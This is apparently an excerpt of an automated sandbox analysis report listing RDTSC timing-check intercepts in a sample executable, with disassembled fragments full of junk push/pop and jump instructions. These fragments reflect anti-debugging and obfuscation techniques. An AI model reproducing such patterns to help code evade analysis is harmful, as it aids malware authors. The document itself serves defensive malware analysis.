Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68240 second address: B68251 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68251 second address: B68274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007FAAAC4EC6B4h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FAAAC4EC6A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69C86 second address: B69CB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007FAAAC4EBB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FAAAC4EBB26h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FAAAC4EBB30h 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E86 second address: 5370E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E8A second address: 5370E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E8E second address: 5370E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E94 second address: 5370EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e pushfd 0x0000000f jmp 00007FAAAC4EBB33h 0x00000014 sbb ah, FFFFFFFEh 0x00000017 jmp 00007FAAAC4EBB39h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FAAAC4EBB31h 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAAAC4EBB2Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350123 second address: 5350160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FAAAC4EC6ACh 0x00000011 or cx, 3ED8h 0x00000016 jmp 00007FAAAC4EC6ABh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350160 second address: 5350164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350164 second address: 53501AA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FAAAC4EC6ACh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6B8h 0x0000001a sbb esi, 33078398h 0x00000020 jmp 00007FAAAC4EC6ABh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501AA second address: 53501CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAAAC4EBB31h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501CE second address: 53501D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501D2 second address: 53501D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501D8 second address: 53501DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501DE second address: 53501E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E2 second address: 53501E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E6 second address: 535021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FAAAC4EBB38h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAAAC4EBB2Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535021A second address: 5350229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350229 second address: 5350241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B85 second address: 5370B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B9D second address: 5370BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BA1 second address: 5370BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6B3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BBF second address: 5370BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EBB2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BEE second address: 5370C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C0B second address: 5370C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C11 second address: 5370C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EC6B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C31 second address: 5370C40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C40 second address: 5370C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C58 second address: 5370C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370794 second address: 53707AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707AB second address: 53707CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707CE second address: 53707D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 2145319Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707D8 second address: 5370857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FAAAC4EBB31h 0x00000010 pushfd 0x00000011 jmp 00007FAAAC4EBB30h 0x00000016 xor cl, 00000018h 0x00000019 jmp 00007FAAAC4EBB2Bh 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov ecx, ebx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007FAAAC4EBB38h 0x0000002f sub eax, 463382A8h 0x00000035 jmp 00007FAAAC4EBB2Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370857 second address: 53708CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EC6AFh 0x00000009 xor esi, 22FAC7EEh 0x0000000f jmp 00007FAAAC4EC6B9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FAAAC4EC6B8h 0x00000021 sub cl, FFFFFF98h 0x00000024 jmp 00007FAAAC4EC6ABh 0x00000029 popfd 0x0000002a movzx eax, bx 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAAAC4EC6AEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538030A second address: 538037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007FAAAC4EBB2Ch 0x00000011 pushfd 0x00000012 jmp 00007FAAAC4EBB32h 0x00000017 jmp 00007FAAAC4EBB35h 0x0000001c popfd 0x0000001d pop esi 0x0000001e mov eax, edi 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FAAAC4EBB2Ah 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FAAAC4EBB2Dh 0x00000030 pop ecx 0x00000031 mov al, dh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538037F second address: 5380384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53903E0 second address: 539045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FAAAC4EBB2Ch 0x00000010 pushfd 0x00000011 jmp 00007FAAAC4EBB32h 0x00000016 or al, 00000038h 0x00000019 jmp 00007FAAAC4EBB2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FAAAC4EBB39h 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAAAC4EBB38h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539045D second address: 5390461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390461 second address: 5390467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390467 second address: 53904F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushfd 0x00000007 jmp 00007FAAAC4EC6B9h 0x0000000c or eax, 149CE396h 0x00000012 jmp 00007FAAAC4EC6B1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007FAAAC4EC6AEh 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 jmp 00007FAAAC4EC6B0h 0x0000002a and dword ptr [eax], 00000000h 0x0000002d jmp 00007FAAAC4EC6B0h 0x00000032 and dword ptr [eax+04h], 00000000h 0x00000036 pushad 0x00000037 jmp 00007FAAAC4EC6AEh 0x0000003c mov dx, si 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904F6 second address: 53904FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904FA second address: 5390500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390500 second address: 5390506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390506 second address: 539050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53705C1 second address: 5370611 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAC4EBB30h 0x00000008 or ax, 2578h 0x0000000d jmp 00007FAAAC4EBB2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FAAAC4EBB36h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAAAC4EBB2Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370611 second address: 5370615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370615 second address: 537061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537061B second address: 5370621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539003C second address: 5390040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390040 second address: 5390046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07B2 second address: 53B07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07CD second address: 53B07D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07D3 second address: 53B07F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB39h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07F7 second address: 53B07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07FD second address: 53B081B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAC4EBB32h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B081B second address: 53B0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0821 second address: 53B0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0825 second address: 53B0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0829 second address: 53B0865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAAC4EBB2Bh 0x00000012 adc ecx, 2B8C77AEh 0x00000018 jmp 00007FAAAC4EBB39h 0x0000001d popfd 0x0000001e movzx ecx, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0865 second address: 53B088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EC6B7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B088F second address: 53B08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [775165FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EBB2Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B08C0 second address: 53B08E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bh, 4Dh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A0D second address: 53B0A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, E3h 0x0000000d mov edx, 68F77A24h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FAAAC4EBB2Ah 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A37 second address: 53B0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A3B second address: 53B0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A3F second address: 53B0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx esi, di 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A4A second address: 53B0A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536005F second address: 5360065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360065 second address: 5360069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536013B second address: 5360141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360141 second address: 5360147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360147 second address: 53601C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6B4h 0x0000001a sub ax, 0B18h 0x0000001f jmp 00007FAAAC4EC6ABh 0x00000024 popfd 0x00000025 mov dx, cx 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dx, cx 0x00000031 pushfd 0x00000032 jmp 00007FAAAC4EC6AAh 0x00000037 jmp 00007FAAAC4EC6B5h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53601C2 second address: 536022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 23F2h 0x00000007 mov dx, 8D3Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FAAAC4EBB35h 0x00000014 mov ebx, dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FAAAC4EBB33h 0x0000001f pushfd 0x00000020 jmp 00007FAAAC4EBB38h 0x00000025 xor ecx, 4125D498h 0x0000002b jmp 00007FAAAC4EBB2Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536022B second address: 5360253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 45BAh 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FAAAC4EC6AAh 0x00000012 mov dword ptr [esp], esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAAC4EC6AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360253 second address: 5360257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360257 second address: 536025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536025D second address: 5360266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 49C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360266 second address: 536031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e mov ecx, 42F020EDh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 call 00007FAAAC4EC6B6h 0x0000001b mov ecx, 21C33591h 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FAAAC4EC6B7h 0x00000027 or ch, 0000007Eh 0x0000002a jmp 00007FAAAC4EC6B9h 0x0000002f popfd 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007FAAAC4EC6B1h 0x00000037 xchg eax, edi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FAAAC4EC6B3h 0x00000041 sub ecx, 0865783Eh 0x00000047 jmp 00007FAAAC4EC6B9h 0x0000004c popfd 0x0000004d mov ch, 27h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536031B second address: 5360321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360321 second address: 5360325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360325 second address: 5360329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
